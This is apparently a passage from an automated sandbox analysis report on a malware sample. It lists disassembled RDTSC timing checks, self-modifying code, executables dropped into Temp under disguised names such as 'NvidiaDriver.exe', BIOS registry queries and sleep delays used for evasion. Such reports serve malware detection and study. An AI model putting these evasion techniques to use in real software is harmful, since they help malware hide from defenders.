00007F6254B873EBh 0x0000005d popfd 0x0000005e popad 0x0000005f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A207B7 second address: 4A207CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 2F900B7Ah 0x00000008 mov ax, di 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A207CC second address: 4A207D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A207D2 second address: 4A207D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A207D8 second address: 4A20812 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254B873F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F6254B873F7h 0x00000015 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20812 second address: 4A2085A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6254D230BFh 0x00000009 and ax, 6E8Eh 0x0000000e jmp 00007F6254D230C9h 0x00000013 popfd 0x00000014 push eax 0x00000015 pop ebx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, esi 0x0000001a jmp 00007F6254D230BAh 0x0000001f push eax 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A2085A second address: 4A20863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 movzx ecx, bx 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20863 second address: 4A20887 instructions: 0x00000000 rdtsc 0x00000002 movsx ebx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6254D230C9h 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20887 second address: 4A20897 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6254B873ECh 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20897 second address: 4A208BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254D230BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F6254D230C0h 0x00000017 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A208BF second address: 4A208C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A208C3 second address: 4A208C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A208C9 second address: 4A208DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6254B873ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A208DA second address: 4A20906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 sub ebx, ebx 0x00000009 pushad 0x0000000a jmp 00007F6254D230C9h 0x0000000f popad 0x00000010 test esi, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20906 second address: 4A2090A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A2090A second address: 4A20910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20910 second address: 4A2095F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6254B873F0h 0x00000009 sub cl, 00000018h 0x0000000c jmp 00007F6254B873EBh 0x00000011 popfd 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 je 00007F62C708CE3Ch 0x0000001d jmp 00007F6254B873F4h 0x00000022 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A2095F second address: 4A2097C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254D230C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A2097C second address: 4A209E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 mov dx, F6EEh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ecx, esi 0x0000000f pushad 0x00000010 push edi 0x00000011 mov bx, cx 0x00000014 pop ecx 0x00000015 popad 0x00000016 je 00007F62C708CDF7h 0x0000001c pushad 0x0000001d push ecx 0x0000001e mov di, FEE4h 0x00000022 pop edi 0x00000023 pushfd 0x00000024 jmp 00007F6254B873EAh 0x00000029 jmp 00007F6254B873F5h 0x0000002e popfd 0x0000002f popad 0x00000030 test byte ptr [76FB6968h], 00000002h 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a movsx ebx, ax 0x0000003d call 00007F6254B873F4h 0x00000042 pop esi 0x00000043 popad 0x00000044 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A209E4 second address: 4A209E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A209E9 second address: 4A20A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F6254B873ECh 0x0000000a sbb ecx, 4E10A328h 0x00000010 jmp 00007F6254B873EBh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 jne 00007F62C708CD8Dh 0x0000001f jmp 00007F6254B873F6h 0x00000024 mov edx, dword ptr [ebp+0Ch] 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F6254B873F7h 0x0000002e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20A47 second address: 4A20A80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 movsx ebx, ax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebx 0x0000000d jmp 00007F6254D230BAh 0x00000012 push eax 0x00000013 pushad 0x00000014 popad 0x00000015 xchg eax, ebx 0x00000016 jmp 00007F6254D230C6h 0x0000001b xchg eax, ebx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f mov cx, 7653h 0x00000023 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20A80 second address: 4A20A84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20B54 second address: 4A20B66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6254D230BEh 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20B66 second address: 4A20B88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 pushad 0x0000000a mov ebx, eax 0x0000000c popad 0x0000000d mov esp, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6254B873F1h 0x00000016 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20B88 second address: 4A20BF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6254D230C7h 0x00000008 movzx eax, dx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F6254D230BCh 0x00000018 jmp 00007F6254D230C5h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F6254D230C0h 0x00000024 xor ecx, 7D14CD38h 0x0000002a jmp 00007F6254D230BBh 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20BF3 second address: 4A20C0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6254B873F4h 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A20C0B second address: 4A20C0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30DA6 second address: 4A30DB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254B873EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30DB5 second address: 4A30E59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F6254D230BFh 0x00000008 pop eax 0x00000009 call 00007F6254D230C9h 0x0000000e pop eax 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp], ebp 0x00000015 jmp 00007F6254D230C7h 0x0000001a mov ebp, esp 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F6254D230C4h 0x00000023 or esi, 76EECC78h 0x00000029 jmp 00007F6254D230BBh 0x0000002e popfd 0x0000002f pushfd 0x00000030 jmp 00007F6254D230C8h 0x00000035 xor ch, FFFFFFD8h 0x00000038 jmp 00007F6254D230BBh 0x0000003d popfd 0x0000003e popad 0x0000003f pop ebp 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30E59 second address: 4A30E5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30E5D second address: 4A30E63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30B30 second address: 4A30B42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6254B873EEh 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30B42 second address: 4A30B46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AB07AA second address: 4AB07CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ah, dh 0x0000000f jmp 00007F6254B873F2h 0x00000014 popad 0x00000015 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AB07CC second address: 4AB07F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254D230BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6254D230C4h 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AB07F2 second address: 4AB0819 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254B873EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6254B873F5h 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA09E2 second address: 4AA09E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA082E second address: 4AA0834 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA0834 second address: 4AA0838 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA0838 second address: 4AA083C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA083C second address: 4AA0858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6254D230C1h 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA0858 second address: 4AA085E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A401E3 second address: 4A401F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 06h 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A401F4 second address: 4A401F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A401F8 second address: 4A40210 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254D230C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A40210 second address: 4A40216 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A40216 second address: 4A4021A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A4021A second address: 4A4021E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA0BEB second address: 4AA0BF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA0BF1 second address: 4AA0BF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA0BF5 second address: 4AA0CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F6254D230BFh 0x00000010 jmp 00007F6254D230C3h 0x00000015 popfd 0x00000016 call 00007F6254D230C8h 0x0000001b pushfd 0x0000001c jmp 00007F6254D230C2h 0x00000021 sub si, BDB8h 0x00000026 jmp 00007F6254D230BBh 0x0000002b popfd 0x0000002c pop esi 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 jmp 00007F6254D230BFh 0x00000035 push dword ptr [ebp+0Ch] 0x00000038 jmp 00007F6254D230C6h 0x0000003d push dword ptr [ebp+08h] 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F6254D230C7h 0x00000047 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BABBC second address: 6BABC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BABC2 second address: 6BABC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A5065D second address: 4A50709 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F6254B873F1h 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F6254B873ECh 0x0000001a sbb ecx, 04EC1A38h 0x00000020 jmp 00007F6254B873EBh 0x00000025 popfd 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F6254B873F6h 0x0000002d adc ch, FFFFFF98h 0x00000030 jmp 00007F6254B873EBh 0x00000035 popfd 0x00000036 mov edx, eax 0x00000038 popad 0x00000039 popad 0x0000003a push FFFFFFFEh 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f pushfd 0x00000040 jmp 00007F6254B873F7h 0x00000045 and eax, 2B71BA0Eh 0x0000004b jmp 00007F6254B873F9h 0x00000050 popfd 0x00000051 mov si, B317h 0x00000055 popad 0x00000056 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50709 second address: 4A50783 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, dh 0x00000005 mov ecx, 5BAF5C2Bh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push 23890239h 0x00000012 jmp 00007F6254D230C7h 0x00000017 xor dword ptr [esp], 5570C221h 0x0000001e jmp 00007F6254D230C6h 0x00000023 call 00007F6254D230B9h 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F6254D230BDh 0x00000031 xor cx, 4906h 0x00000036 jmp 00007F6254D230C1h 0x0000003b popfd 0x0000003c mov bh, ch 0x0000003e popad 0x0000003f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50783 second address: 4A507F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6254B873F8h 0x00000009 jmp 00007F6254B873F5h 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007F6254B873F0h 0x00000015 or cx, 2D38h 0x0000001a jmp 00007F6254B873EBh 0x0000001f popfd 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 push eax 0x00000024 pushad 0x00000025 jmp 00007F6254B873EFh 0x0000002a mov bh, ah 0x0000002c popad 0x0000002d mov eax, dword ptr [esp+04h] 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A507F8 second address: 4A507FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A507FC second address: 4A50802 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50802 second address: 4A50824 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254D230C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A50824 second address: 4A5082A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 4FECE2 instructions caused by: Self-modifying code
                        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 4FEDC0 instructions caused by: Self-modifying code
                        Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 73B671 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: B2ECE2 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: B2EDC0 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: D6B671 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSpecial instruction interceptor: First address: E278CD instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSpecial instruction interceptor: First address: FF5E6F instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSpecial instruction interceptor: First address: 10595E5 instructions caused by: Self-modifying code
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeMemory allocated: 1050000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeMemory allocated: 29F0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeMemory allocated: 49F0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeMemory allocated: 26B0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeMemory allocated: 2840000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeMemory allocated: 4840000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeMemory allocated: A20000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeMemory allocated: 2600000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeMemory allocated: B60000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeMemory allocated: D70000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeMemory allocated: 28A0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeMemory allocated: 26B0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeMemory allocated: C30000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeMemory allocated: 2720000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeMemory allocated: 2650000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04AA0C3B rdtsc 0_2_04AA0C3B
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 425Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeWindow / User API: threadDelayed 523Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeWindow / User API: threadDelayed 6019
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeWindow / User API: threadDelayed 3450
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeWindow / User API: threadDelayed 2037
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeWindow / User API: threadDelayed 1843
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeWindow / User API: threadDelayed 409
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeWindow / User API: threadDelayed 1381
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7692Thread sleep count: 37 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7692Thread sleep time: -74037s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7688Thread sleep count: 38 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7688Thread sleep time: -76038s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7676Thread sleep count: 425 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7676Thread sleep time: -12750000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7696Thread sleep count: 34 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7696Thread sleep time: -68034s >= -30000sJump to behavior
